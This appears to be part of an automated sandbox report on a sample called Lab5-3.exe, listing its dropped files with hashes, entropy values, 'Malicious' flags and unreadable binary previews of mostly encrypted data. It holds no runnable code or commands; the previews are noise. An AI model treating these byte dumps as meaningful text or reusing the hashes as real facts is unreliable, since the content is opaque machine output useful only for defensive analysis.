                                                                                                          MD5:85C9E4DA710CCB0ED07A80622BE2FEFA
                                                                                                          SHA1:E5F53473219C743D1A40DD94847A36D0A8267041
                                                                                                          SHA-256:944F26C52FC602C93E165BD0DBEB6538670A35A776DDAC43C18467C8DB7F5706
                                                                                                          SHA-512:86262812A4D1F3DD2E4B848668C285061FFF31CB99400C7F2F12E69718D1735D022C506802874C6F779BF7430800C74B4FCB47F21F415866E68F03A80445D6BD
                                                                                                          Malicious:true
                                                                                                          Preview:cD..v.$...........?..P.Q.......;UwD.>..Q.52....DG..v.....>.[>.{%.....1C.R|..f..C....h.1. ...&.F.NR.~.0o.[..w>......6mJ..^..`..S........H....T.....>..U.......N...{...ZG..b$. =.e.W.kXa.,O.y..%..>...........I5.@o.v..X"(.b.~f2p.&2.1.P...B...V.=<J..L.*."4y.U{.h*..|..i........9..ybY..+.M~....a.".E....E.e..k.~A...,.$07.....r......x.....~=;R...._.x.U.7..T....Y.wjE.(.o...y..4_.s......T.....*..... ...o..... s._...`j.B."...i...6.`i=..$\;.j..ln.N?..2.S.gwN..5....^..A:K.:Q.l.....p...O.q.....).f&~.@f?....]..8..."./....O.jr "#l>..J'.T...;.Ai.DF./..>rp....j..nD....Ya1.)..........C.."DT...,$.>.L.IG..f.........dO.--wK.>.D.B.....l...U.&.*......Y(.U...N.6Q(3.8V.1..~.9.D2.te(%.R../..6K....O.SP.t......9o..3R.N4.].3..D.7.......aE..m.ap./Y.%%`5[=H..c."..}..?.sIc..v.K..Tfd@zH8.g.1.&e.2?g...y....$..&yv]...V...g..S.8t...1..C.w.|..r...../.b...x..a...Q.....g.4R.O....w....:...H.l....$.._f5w..w..t............o...d_........@..9.F.2F..:Z......Qd..?.v.Ysu>\...~.......4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.9190228760078645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HiTqHcxdt+I9aLM13Z74DVIHfUTid3hBaUoSGFcmeykEdEElU92i:CTxyo13tMGx0uKeY2ElUJ
                                                                                                          MD5:29A55B4752206F0C6DA1EA8F32CFF5D6
                                                                                                          SHA1:C244D882AF37702799BDCE91E23579C065177545
                                                                                                          SHA-256:1EFC5546065DD18AFA1E8E28E2951660E99A23A7D5F4A36EF6D8B1A6DA712FD2
                                                                                                          SHA-512:18CC46785F716E4B760A31A3A6B10290C9B7057FB0643771FFFF76BD428A1E4781D9DDF1E4BCB9A8F17A5F16AB03377394D76632BB2EA4DD15D9A680A0E24593
                                                                                                          Malicious:false
                                                                                                          Preview:..9...U..I.n.h.[X<.I.D...-.wu......._..;.lj...@L3....p...E._8.~.*.9..5.Q.....HP.d.....?.Xn.V.A.[7>..!.j.!. ...OMB..#...6....T..`4......9yJF....|........9....X.8i.H.9Hf;q3..5....z.^<.\..]j..Fj..%.L.]...dFNnn...uP.|.1N&L?..I.te.=....|...b....8w@1.s....aG...<Q..P.3.......S>....Q.....}..|...B.l.v..j........_.%...V.1..0.....C.......j.?...tEw.4.N.".t7I..P.{C...a.ytA`H.$...).'c.....d^.W.......:./KpR..b...$.a.U...dk.'A...V.......L..O].z.NJ..9F...K0.....$.y...Eq@8>`.>......d.9..'..............a.1..p...'~..jm...|.H.?Hp$x...DJ........0.On.....G.Vh&..._<.WO......P.....d].h.CW..As..u~.r..m.6."I.w.....A.F..&.......e.rn}...@t.yZ.k....)..s...kOd.1.,"..;....Q4$ndE..v.j..^.\.c..5.@v.+...A.q..)m..MwL...._...&...+n. .....VM.O.q..3...j4..S.EM.lH..O.4]....t...i..d.FO.~...#.(.)F..../0X........._nj...\....."..S[..-..`..+...Dm..f9J...B...........O..%i%........mC.U..............2.'...[.j.>..i.5.b.l.......n'..k..!.$.$;R6.;.......*.M.B.%.n....{...{.g..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26624
                                                                                                          Entropy (8bit):7.9927644824695685
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:v4VnUkef0ANEXroSwqye2KrlpHNptDSSQ+Z:gipEXkSw5eTOL+Z
                                                                                                          MD5:AACE0E4811648EB97004EB82140107CF
                                                                                                          SHA1:7938FBD7E060DDA0FCF08BB43C9A3108F8233034
                                                                                                          SHA-256:BC22B9C512B89E225688E99AB144582B2E0514E3A8A435611E09992CB454DDE2
                                                                                                          SHA-512:8433193E7A6350F3005B8F46B354B19A70A2933B90AAA00D8E5C8CA93C770FCA56A98570C97477F7D5733F5D92522CC3607CD532473742D8E9B191812793170F
                                                                                                          Malicious:true
                                                                                                          Preview:...R...,...?..a"..9$.y.C.?.gZ.%S8H..$....1...w...{\...xz.....K.w...jj.2....P.!....<...-.x...>.....Z..x.R.0.C7.>b.|[..#.o.{0.....]..;....^...-.......so..:R.C.`.y.F..5.........p)K.xH]+^....@V..(w..0X.*.w..{..o...'.....3.).l...x.].D......J5.7.<3.q.[..$._.e?...v..Y1+3!4......J...x.U.1n..-O...B....3.m....,...&......>............TO......A..c..@4.'w....$Q.........+..l.>X'.`..._.-k.5..=..].....x.....5.....'e......$.\.Pu.....{.o..'6..r..k....3.z.:(....fbjN@.1^..He.......>.4.+..>Nc..)t..se.?....[v.....YM.K...#.....6_..qLb..V....f.....g.8xJ.....z.t..C..=.%..8....\Y.k..w.....;al.B.@L...ref..].*....@.\...W...e....1h........S..x.Sy....I....$L..fh..j...lF.T.......K.v..r..%.":...z.!T{..........l...&...#.R[]..2..k:.f..H.mP...hY4.f..AY..K.z?K.s.DK6.f{..=..ou...LKa..ex..4.........c@v*.Q.tq.9....i.@..TUQ4L..*:..k..s..9$^6.?W.:..$h....E.s...-W..t!.=.4`)..\...R............<..Z..\<.h.........MV=....s.+..i.l..cl.....B.."..M..I.UZ.0kO......n..Bm...)!S.p.#.{.1^.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31024
                                                                                                          Entropy (8bit):7.9941153319813045
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:3xlPDfTkw0lV7jyEdbbLBgIacsGVNjOk8yN+TAZ:owA24bLu93UJhbZ
                                                                                                          MD5:CFD47357B782C98D44422A5A4AEE6AA5
                                                                                                          SHA1:5529E98F1C669D7228956E0E4A31E11807D67EED
                                                                                                          SHA-256:BE07EF96681E91DEBA717C9E100C3327AE117FA955BC493F8480216EE4253AAC
                                                                                                          SHA-512:785614112DCB85814292B86CF70700CBE27E296A58DAA97EF2999F061B7FE82D6B69CC24CC89A0E40CD8414AD2C300D27C23C0948364D2C06B64094F9F1651E1
                                                                                                          Malicious:true
                                                                                                          Preview:.r..7.I.6..g.I....fy,$.9r.....K.Ei5.......'8...Lo...~.~<.P_...........C#V6:..TZ.5...6..Y...\.........jw..FMkZ.L..3dx}..V38.....FJ_...d..e!k..3. ..m.Vx..2(4.C3.1.v...[1[`.._..iJP..<.'.vf..x.....0..Pu.:i..k..Qp..ON.2..?.....7..=....y.;!U..j..&^%.l..m....g-.C..ZT.;F.:...s.h..G.|>n..Nu.%S.H.....N.,....r.t_D.b.O.&@..-).S.I......|Q..0.q................Q..U.....z..&&....A.xI"....Y."[.PJC......)(D.#@.6.+. ..y.y.......w`.,. .YAe.Z|..'...k.0.J!k?i>..T.|....KbS..o.A.J..n..............N.rmdVQ.v7..P*..h...........N..s.....[...s..4M.....N.B.4.g.cU.E..o...p...;....t(T...&.....=..k..#..R...a,..?o3OTf..F/..xE..?.]{...\g..S..I\m!..(O.(.3I...A..c>.Hq...Z...7...."?j.8...K..Mq.'.[....._.Qm`Y..I..g.6}.3x......ER.(.j.&F.....y6...Wqu!.....1.P7........P..,.b...O....`....-u....r.....t...kk.D."|./...$."..em..l.....R...z........e.............P....6. ...I..MI?S./6.....9lS..sH{.|.V...d....p....h..r...e.2..#.....l.....:'....g.v!.(...G..]....m.~...}.w..U<..{....'-...u....o
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30128
                                                                                                          Entropy (8bit):7.994089724990991
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:JLr88fuS2pivCFZS2Up+1nrQ8BIRAZepeGZl9Z:JLrjfVCF77SiKAEplZ7Z
                                                                                                          MD5:6D5953383E533DAE60BDBD8DC58EAAEF
                                                                                                          SHA1:3E644F831C6E21D6AA698A9571F6A56612EF2CC2
                                                                                                          SHA-256:B8B9259546C8E73DCBD86FAC93FCB94F15398287A0414B8DD98F475CD234A39F
                                                                                                          SHA-512:F7291A16DC352B33DD53357B35DDE44D3BE34CDA9C1A5568567E966DEE102291253ADB48385E543B7B110100F0A8A264D67A19A979C59B1334CA5174E3988A74
                                                                                                          Malicious:true
                                                                                                          Preview:.3f.<rL...p..C...d..z....(...-..m...:b&ck...Kn...>Gl..2.)aW.r......3.t..a.-P...a.5..m.Ss.}I.....11u.3t.&..............LR....HEj.(..m....!...a.+...k..r...Z.H....>....|.et..../..B,5r..fTg5..r@.;...2.......6L....J@...~..=.'n5W.x7...#.Y.....l......0...#z..D0.i..P.....y+>...OSv.&.S..kT..~.+..;Z.nqw...x)...L2.%...h...3U..`G<...I.......11...r...v.....&V.5iy..ul.Mk..*l...D.*Hn._...B.o+.q.H\[/..=Y...a.."....l.>.....Vi.......3....W.......[.+ ...(.A,.[d./pmv.vs.u.2..@....,..m..4.?H..{..E.H...os3o.......f:O...i1......F*..Vs.m......Mg.V.......'...pl..n....aV$k;.E0?...4.`.^?|.p_P.H`....t..].".n#..(oz` z.O....YM...'...A........!....;..9...DP..^.q.n?3K..-.C......F..As......2...P....$L^.N.m.M..an..4..a9.6..p......U.......n"..I|.d.....?V.....iD..-E...`~Kx.'/.{...=0[.....Q.].3[x...<5d.z..b.Q.%.%....:.R..)......,.....$...ujyW(..=.u~iZH.&....7...n.........%..x.;.Z.(...........&....M).......f..B...=.R......;.h^..-._..B^.1..#q......`...M..*CZ..P&BXJ%.q/Fq..9..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30832
                                                                                                          Entropy (8bit):7.994242906823771
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ABdEEbXTvXzHsuxT2JnjKu8KeFF9ir54B8YAUZ:GXbo72umhi968oZ
                                                                                                          MD5:AF3B8791B0BB363E1A83C3B331E07A59
                                                                                                          SHA1:AF7A9056CFA9986C3E8CB0BEF87A7A7FBA209E70
                                                                                                          SHA-256:7D1689BA908316C4B31FDADE69D1005A686C533F79C8B72141666A73ED7497AD
                                                                                                          SHA-512:7CE7D5F1AE0C4360BA95A03722E0EB11A9161CCFB82ED4936746F3B2D9233AE558157B0F070BD04C96FBCD6375D061937B6F9B608D5A93E4D484F15C122654E5
                                                                                                          Malicious:true
                                                                                                          Preview:..N?N"....5........}j..;.p..../.<%......B......*?...n]I.oWi....m5{eUl=.A~..c.r......'=..>..hxr.B...\?5...D...c,...R...;..w...........F........3E..M.3.E9....*......... ..!~......Z......./x.........@...S..q.B......=....*%b.....`......^....`.e.....;...-c..V............:;i..(M.....yR.51...%4...l..}.^8...q....S..2.y>....}. .t.%..X....[|Lj?.K..H.......Fv.p}..|eCK....6......@_z.....xL....+.>...m}..@.O............B...1.f~..(I...."W..'\.dO......<..I..p......'.....6...F..+>+`Tb..[.L.%6{>*..D. ..L.Z1...K..sZY#\.C..D. _.-..;zf.V..}S8K...@$..T..T.t'..-...1....U...a..f)..7...".`?b-.3.../:...T@[.7l.g'.J.<u.......xX.aI.p..&..-Lf.#.e0.......R.....}.A.4H/d.....;........I..r..v..K.a..~2h...3....L..9&.T\.^P.Jo./..,.....6..|..L6U..O..F-.Q....t)s...].../}<.e.,...q&.9..|Y........Q;...K.@.M..|.7...,.`.{-;I......A...........p.k..:Z....wVa.u`.x..'...\iG\..x....k..R.......d..PHY&.........u`...&.[u.E.#.@...8..*.....8p......'.I./........X..p4Q..g.....=.....+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32624
                                                                                                          Entropy (8bit):7.993705342082047
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:L8skFqqc/WB02GwZ9S32ds+ck70CCEVpnIVZzv5Ji2qrIDVPwZ:LQFTHFe+H7fCEnIV9zt7SZ
                                                                                                          MD5:33EB96836AB72C24495B2F45BD18D647
                                                                                                          SHA1:0963900326181F9C5E7A4C01079D329C748C514D
                                                                                                          SHA-256:F3CC6094674BC71E907D653178D2F6CB8BD591D50E554B6F39F97C7FC0BF0915
                                                                                                          SHA-512:6414FC49D2356502B9486414767C48FB413716BD4E8E79F738ED3546B174B2EDDD32D0CABB4CFAFF853958953236CF34730E0F7E5A463BCF23CD49684EAAE98F
                                                                                                          Malicious:true
                                                                                                          Preview:k.R8...8.K.hD..S...t...QX..v `...@7.`,q............'Rs...J...5T.....o....#9..]Y.aRO.I.X.......E..9.qE.I..>}Q.....W)....w..8:)g...jm.....Wwjg..'"k{.q...m3..m.lea..QQ_..M....f].i.h^....'......#..N....5 .<..W..........e.bI.(....t..I.B._t..D.....v...W....G9.t...}o.X...... ..H...t.P.....9Q.....s.d/.z............a.Z..q..w..'`.?%Z..-..q../.`..y.))..R.9%.n."..@O..&2m..l..p?..5...dH.#.Ga...5.....'...A....k|=.?.H.*OZ.|/RMDo....l..i..qU.....i..M.Hw^.,.......o..`.F....d.t.}...o^....p..N....I...n.x.yX..d.rQ.v,f..fTTR]..K...".h...P..7sZ'......v.._.n.F.:h?X%[....t...S.L..R...^i..>.. .!...Cn.g.y.{k.]f...+...x.nd....K.....;..36[..+.B..t.....'..Bm...E..7YmBw..Mb..U.:.L...?v.4q[.......T!.......].?.00.!k..Z...p|&......D...}......w..S..2.a.V......2(.je.h.~)%l(...\...(...BhKJ....Mr.?....%,>.<s...w.r(1...|..B.8~E.T..Y..4.*V$......^.>!n.ppt.............b.W.L........ZUI.N*.Fc..i/=..x.%w.u....d'..'If.......f.u...x.....-/.yh..b..s....Z.D}.H...b.cf.?..........q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32624
                                                                                                          Entropy (8bit):7.993497439506157
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ATSrnA2opTTOHc2hf/Tcx/BhNTwVrC4Klhf0bsp0pOQ1WAhp+Z:AmrnA2YTonY9PqVG4KlhfmsypVWAp+Z
                                                                                                          MD5:C637F92FC5568C86FFB5DA235E66B282
                                                                                                          SHA1:DCEF716CCB0B951E9A11F45A4347A735C569B0C5
                                                                                                          SHA-256:F33312E26DF6BFA2D538DBFE5DBB9AAF1BEEE51EDFED882301CF2A2E762C5346
                                                                                                          SHA-512:FCC9550B90EBE6565212038B2BFB61E2ED9714BBE7F1E66DF6BD66CBE08DAA211EC48CE9BEBDBD8F4C39FE5C42FF52CF344F2EDB6A235D6532542A1EAE77E8BC
                                                                                                          Malicious:true
                                                                                                          Preview:..w...k....rfGj.. .....&..gd.. ..4\....L.n...BG ..q.\'.pH.V...K[.Z...g...2.YnQ......K/.......2.....9.....pu.W.e.....M........JZ6(.0....y`..|.........I.N&'z^.\...*...c..,!. ..y..8..3.T.....X._..,2".g......?......&.........>-._..D.>.8uvm.....=M+CQ..,....K...Qs....t.."..L../.B.6l3.....n.uVR....}.%...]lX.LN}....a.n6..I./}c9.)...l..O.c..v:6N...m.,.....?V.jA..:O.fR...f.jE....d..a.L.[Vt.x,.f1.#^../...t..c.,.....^..ghG.9r9P;... D.+...Lk.:%).Nu..v.E.p .1.'.n.....A.....7...A-...V.I:4;...Kq..:..|.F.0.5./.....].../..x.X..3.....?.'iI.>.R.8..lo....Z(=...\.a..v.G.n...kSi+.n..R...t.)&...c...i..'n..R.X..6..!r..Ey..D..b..x...Y.${...< I.+.L..{*..+.<..........u...iF.#m.....J=..w.-;x1....,.,....'k.{,...;..MH......rBNS....z...V....V.]{...5...&w.c.%.v.Rg.B;..X.&.......w..jd.kM(.E..(.q..h"..z..+...lun...>tQ..\.=.nk^...._......o...sc.q\FZf...:3T...!.d..M...k.y....Z..J....7D.;;-. .....y..m...5.g...v@e......y.i.<......d....V.@+...n.Kg._oj.I......D.j.....O.a
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30656
                                                                                                          Entropy (8bit):7.993374327645521
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:bg8zhz7cLfj8oWAv1rpYRdCY3MH5aWeFZ:Xtz7iQuv4dZMheFZ
                                                                                                          MD5:533C54715C319CF0FBB1B092CC6BA1D4
                                                                                                          SHA1:DED08BC4F62D4202B20808AA07DFACC935DEA814
                                                                                                          SHA-256:6BF445EEEE9C67F23D6FDDDFD3B1CADE5DC68B4913B2FD3D7DB99F510181917C
                                                                                                          SHA-512:0BF4F48ED5FA0C33F1D5025B2E54B32B40B882DE4E3C57B4E7E5B81A24CFB806C1709859B5A12E3F67CC1553458424E9715124FB4248BB3A055647C6A4B3AD0E
                                                                                                          Malicious:true
                                                                                                          Preview:hZ?`Q...8Y...0E....P...k6..X...n.r....8y.H!...B:R......$DV]......E.J.5......b.....;.....%...:'.On..H.4bjOVy..*.Gg....x.}..k|MOl.4..3.Y...*...:Xk~.4.....H..TR(.n(.B../Ty.'lO.....U.6P.Y.bO....L.gGl7....5.lP...-....,t.L.b.....5O,..rG......].t.B.&g.t..l)......B.Y.;.Pn>5.5!..v..-Z<^7.OB...r.~_J./1fe..u...p...].b.....E.b@.D...lm.d.K.n6/...Y.B.T"gs.D.c.>q.}..E\x@.H.m'-t..>w.c.q..n.HeyB..-R..3N..aR....rx..!....G.RO.SQ.}...I....!.....S8>.zD.Y.R...1.7....$....f?......w.(.P...x.....H>8..2.@:.#.L..j/.(piV.r..x.._..W..+..!h]>..,~_..B%|t))s...3Tr.D..W...)_.R.S).y..4O.U...csr.X_fZ+kE1t.`.t.E..@.3X#..DAbRL...8.#H......Z.{.....\~.Ks=...3.......;.P...o..l>e%.&.....u\..d..|.I.".K{.H)!s..2.A........Y.!..:.~p5]...|..DG."..2...,._5.6k.!P....ZP..~..(..)..*~7^..ty....rK......Z&*....1..8.l.4dTf.......>w..k..x.z...8.f...W9k....V...s..|#.....D.(.*D.*V..SEz.....9X..4Ovi......'y..."...G.j.5...?..|...J|.#...+<..d.....(.....eJMr.X......}..U,...._.....L!..B9.I....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32976
                                                                                                          Entropy (8bit):7.99489843704551
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:G91jxv+DCiYfPlwD+/AEOZEDqZYw4maOi2UPWSZ:aj5n2+If+DqZY1HOgPZ
                                                                                                          MD5:9B8FD709A816E714ACCB66867C0D41FD
                                                                                                          SHA1:DE5D8B2CD12C721DC987F99449C72FCD0750B1D4
                                                                                                          SHA-256:DE78BB9BCD4547A48600B351550A673FA9663D75505E8CAB06681033CC33323D
                                                                                                          SHA-512:1CDC282493C207CC13EBC77F530E5DFC402CF70DA0B5E43F11644CC62682CCCEE8139BABB064E1AD30D78092D53A3B6BAE649B6780B990E00B5E6989A1A9F80C
                                                                                                          Malicious:true
                                                                                                          Preview:h#.7..v..S.d.Ek ......(.a..Q....KDP..{e..f.v..l\].Y4.W.....W.M.j.D.-8..>O...%.3..2|a.\...iF.....1N..c(l.w....I)...T..W....xB..9.)..C..I..Z../M.....hvL..Z..=Um.X....ef..}._......(.oX...3.}h.....Z...>.....#...A..#.`KL......v...:w&].....v.8 . .dM..x..iyO......H.3"..q.&..8/..2&.J...{{X..zA....=I. ....VS6.._6.............Q..S.lF...$.y.%....a{..j.b.C\...|:..=I.`5..I..L(e...<,..IOF.at..h.|...2..a..E..!...:.^<".K.........:...3..J.?..6..y...U.....cA3..j.Q..`..{&......Xj....]k.I...<..5..f^....m...A..It.R;./..f..d..D......s..z:\w..c...+^..2.A...%..X.D..0.;~)....^.s^..a6S^..._...'..l5.j.fn......../\..[N.-x.B..t.{.S@..\.C..[ii%.o..4X[.*.fo.%.'..S.x.W..d.|.3.(.......Z...K...}/.....!..9.'A..`....."..(r.V.T.\9.S..a....8.hkHf.......x....&.u...B.H..S|d..Z.......^.)...".".:=Sv....c...."n...j...."*.Z.st..\.z.a.a.{H...i.A....J.mI_.B.._....m..........Z.%W.Q5k...),.`... 4I.W..:..}9a..N........7}..b.v...D.?U.....h)GPlD.......j..z5g..3....1^....yQ.*...J..Qj!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):29392
                                                                                                          Entropy (8bit):7.993141346992545
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:2Z8B3hjJiIK4ajJlMqBLHN4MOmUd23FCbmpZ:22BRj0IsjJKCLuMBb38IZ
                                                                                                          MD5:070241CA662762AA1D12CC5CB73084F6
                                                                                                          SHA1:D52985D6E60C52826B0196DDFA8D5A189DB706E9
                                                                                                          SHA-256:F7E1BE7FEF895C0F8DFA53221AF588611D54BDFFEC36138FF7FD6E56D897FD14
                                                                                                          SHA-512:57CA9B1E87E8063C01E3DE58DDE2003F7F213BD73B929F1C712B2505B21DEC66190B72408368FC2BA69AE7B7619E33E86CBC6E3452C6FA8E9995876C5EAFCA5F
                                                                                                          Malicious:true
                                                                                                          Preview:qlp....d...`.r....."@;bY),'..R......:......nx....)&W..$2@!...`.._.O`.J.{X!....9I..9_.K.....%..a#.1...!.{Om.3..-.).p...\j.h.....B..q..'..{!Q+memk.Sa...v..xtU..`..kdj....'PjY.eJ.......S.fS..M...{|:..c.b.>...*..RZ.p.....Z..j.u]A.....f.....S..j.-S..W...K....An8.g.|.Vh./x9.o^...zv..>...lGj>..hI.1.Fl|Gq-...(TJ........w..o.....V.7..36..z../....].e&..!1."..PD_..F..].....K..>........P...3d.q.FdUT.....O.L.W&...s...O.^l..U..K&.^..U....V......j.(...y%.].W....ED...yF6y..T1.. ...f.l.L......?../..|v..wV9.f.~....._.....@n...z....'.A....oW(v|..A._Zg9n....G.[..KM].O.QS..:...k. &>.].5..c...u....M.I..S..QsX..y..Y..<.2...+.a.`.6...u.../.G..[m.T...NR..oX..?....Gw...\.H....d...h.TR.:`BP0..;..[C..=..8...;.....Z@..f..l...zf..'.....}B....%eEi....gX.....+.E.d..[...>k.@l.r.4.fXKv....j.......s..p.._..R.g.K..~)..s.TWF..k..._..3}..@.Y/..k+...Hk!..xY.yj..f........Y...A.....?<...l........"..6(4W....G...s..:[)..zos&1...-l.&..y`.....9'. .l.....).'....>h.@.<....E.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35056
                                                                                                          Entropy (8bit):7.995394673615387
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:9nknEumhRjHNJ5CLdBr5CO5pIhsS2btgvtANV7Bk/sKs0F8ahZ:9kELhNNJ5C5rDwsSitg1ANLWp8WZ
                                                                                                          MD5:FE542C28B78503781FA3D5D8E89E2987
                                                                                                          SHA1:7043E7447251CD214B5F6FE7F43E7315FFBB3FBA
                                                                                                          SHA-256:F9A9EDF5C7EF6994DFBDD148B8506394392D190C24A6634B9B7E861DE09655C0
                                                                                                          SHA-512:63207A838CF1A960F770957F40A41D96935CAAEA197AE3D05D5D9E07790D8618F9B67787D9C5CFC65BEF07510F6D4FD0AC15AD26AD0D5437762F65917C02188C
                                                                                                          Malicious:true
                                                                                                          Preview:...b...l...9[H)..\.Vy....[.[.EE....<+.?.<......X..2Y...$V@(.k.px.......<.e[.Q..d.30...#H.^.....}.#Y|.}....;i...3.......m6.'c.........\z...y../..?t.g.#..`.r.._.:Y>5......X.T,yi y.6.f\:.X.h..^<.x.ja...}.3..}.U...}N..,.......F.p.Z2..e......cL.2.g.e7...p..`Q......j....a..\....W?.|.Ys.....G.q....B7.$.pN.w....bP.d..5...!lxM...x..c....}..x.,4..m..s..y...|c..|.l.I&..z..|Q..d.C^...Y.;.d...V#.Z...{.`.:....[9..j..xN..sN1....%`d:....A.jy...z..m.o-.....^..&..t....x{p...3#..x4..i...:.'...........>..=......u.`.~.r.f.(.] ..[.M ..a.......H.9b=.dwk..2.p....mA..{p.nD.+.r..T.h...n......O..L..)...m.E.>...<.~...........J....A.@z.....Fjjm....R4..!..0iO,..=....g!.....w;..K4B..Ec..9.I.........x..|];.r..+7=_U...'..{C.....,.bS.@..[0...6...4...t.bc..S .......Gq..s..8....m4$/x=..i`r3....:.....z....N/...?....N..]........}.Y.n...Y.3.....t.".z..d.s%..........^...V.\."..[:....<........1)...71LG3.m..NM......W.!.z.)w...H.........M*.....2....#...>E......7..I..b..M.v..!}@..Gu....`...M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31856
                                                                                                          Entropy (8bit):7.993881320882344
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:oUnisrdwRUj4wv7KUuk3/am40LBptNtTw7BpUaHJid/Z:oUiQXjKU5VZFXEUapqZ
                                                                                                          MD5:F1430A0A3F46B35C6A1DD38A17A63F25
                                                                                                          SHA1:E60FAC47C4FD0BF27D4CB1DDB71BB405C690B5B2
                                                                                                          SHA-256:B0332B8D347C4F97462B95908029495DB4B52D3E27B9882944E823A7958C5ED6
                                                                                                          SHA-512:91563970B04C78C8D64F761422566416139E651D91595EA429A7007BEDB0B0EA3DCF4236DA8AC6D7C8D2371E8F2EBC4F6E6229E49F5A8A4A878C7EABBF8C6E06
                                                                                                          Malicious:true
                                                                                                          Preview:;..7.Kv;P..T.h..R..n!..........4{.l]....X.<.........h..'..xQ..iH....LR.Z..E-.......D9K.d....,.9.h.M.CT..;............gQ...sS..b.h#.......${..y..B$..A.)b..oM.0.4.......r(.m.(...i...[.}mZ..T..f.;[.'rpiy......`..#GV.8...."."...d7..;.5..5.....q.+..(..@H....d......$..s....%d.-1.0.MsLqL.....L..!./...qK.L'D7..!..D2...Q.3%c_d..._...N....eZ1M.;p.Fu.....f.z......6.n....M.y.'0...F..,..{...?....D|..O.i_:..~.Zi`.....x..A1[.....W..ni.<..d......%.".(..'.1.Y.Z.....`yA) .2.A.l#%.N#.th.5.N%...B.X,.\.F.j....G.B."..<)m.%v..Y..#..`iV@x.v]..f<.F.TA.L......EM;.\...$.......Ul..C...`@.@.....a.+9.z8.8...).....Kx.oA.H.P..: Vb...}.k_Z.PM.VB.[....(..-.8..8.a'd0..\D....&+?^%o.......s.3~......K:"..l8.......[...../..Aj>........z_...+..=..3.`..Qp..T.......o.i..A.$....]..i.............,fm.+.a...#.?...*'v.."=).U.E.r......a&......o*l#.+...Z.5..cbynF.zI..EBT..kK.....%w..51\[. oI.&.=/..c..+..X....pw.t.U=E:.....t..{....w_P.../.&...2.Y;:^.....C <\0.p..5.T.....A+..r..GI..e.{
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28432
                                                                                                          Entropy (8bit):7.993055127692336
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:bRkqBvXCiX9+N1rsm27nw1HieuxBru5sWLL2WZ8B1Z:bRkqIit+NdEw1HinBrq23Z
                                                                                                          MD5:F522BDF7383AB97CF2A5756D69C0501A
                                                                                                          SHA1:7C5BA102048B7C345EAA926B8C6312552EC794C5
                                                                                                          SHA-256:42B0A1AD9B16A93DF62546C2A69F9AED02035368339029005698F034EE3D0152
                                                                                                          SHA-512:7D5A42FB27911545B534A6DD338AABB5570A0B5E5686B4014F4A3A0DE8D191AB6FC42F7B6F1BC679158DD04EB217BEE505FAE4294415DB983EBFB7CEF6DFB8DB
                                                                                                          Malicious:true
                                                                                                          Preview:......t.=.....=...P....yu..K.\.s...9.'X..r.......0.p.5d.. ..n.z..w...f1L..".)..B..-..j.#.;...`.V.PY.H......b......-.E..0......z^......&.]N.f|y.c.......|;..?..L$.1m...V.G...Z...X.R...(.J`W.'...x...1..b..xF..b%xQ.m.]P%W....3.x..n.w5.....Ht..q:7..K.c....A.qb:.o../..Y@.(./....@U.g..-n~...'T...W..."e......R.3......t...&........KV..]..E..n.....[T..H.@gv...'.+.o~g!VP%1..YQY..B......m..H..EY.u..k2}...1.7..G+.fI.t....c*.Y..}fq..2..te......RB..$.C......._m.x....G6...4....Y.U..a.U."/!$..$.B.}5...!s.M..~0..#i....)G...s...y.J0zn.....N......F5..n.`.DB..5.5....8z..M.r.....d..].uh.....@.\...,.o.....l..jq.^..........7(.}.D.\.....}7{.(vT.c........7../.v<1:&e.\b...G=.x....]..].s`..R..&".B=..N^.u..z.jk&s.k./..n.y.....l.K@`...j.9..5.....=...........,.1..rp)*..^'U;~...@F5..9.O?..qm...L@......An.<.1......ij.......hl..w.t..E.a.L.T.].....HX1.e...^..h.FI.6l.v.6.-9..:.#..&=.D.W0{k..e..<@.c...I.{fO....H.....M.....h.Q..........K.C..3.;....'....i.9$..}.>..[.....[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
